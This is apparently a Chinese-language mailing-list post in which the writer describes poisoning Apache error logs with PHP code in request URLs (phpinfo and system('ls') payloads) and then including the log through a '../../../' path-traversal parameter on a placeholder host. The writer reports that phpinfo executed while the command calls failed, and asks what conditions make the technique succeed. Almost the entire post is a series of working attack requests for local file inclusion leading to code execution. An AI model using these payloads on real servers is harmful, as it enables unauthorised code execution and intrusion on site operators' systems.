测试环境 unix+php+mysql+apache 1 http://target.com/fuc<?phpinfo();?>.php 2 http://target.com/fuc.php?url=../../../usr/local/apache/logs/target.com-error_log
成功看到phpinfo信息,代码被执行。 接下来 3 http://target.com/fuc<?system("ls+-la+/home");?>.php 4 http://target.com/fuc.php?url=../../../usr/local/apache/logs/target.com-error_log 失败,并没有列出/home 目录,没有权限? 5 http://target.com/fuc<?system("ls+-la+/home/www/target_com");?>.php 还是无所获 请教,关于包含apache日志利用的细节,哪些应该注意的?能否成功的条件 谢谢! --~--~---------~--~----~------------~-------~--~----~ 要向邮件组发送邮件,请发到 [email protected] 要退订此邮件,请发邮件至 [EMAIL PROTECTED] -~----------~----~----~----~------~----~------~--~---
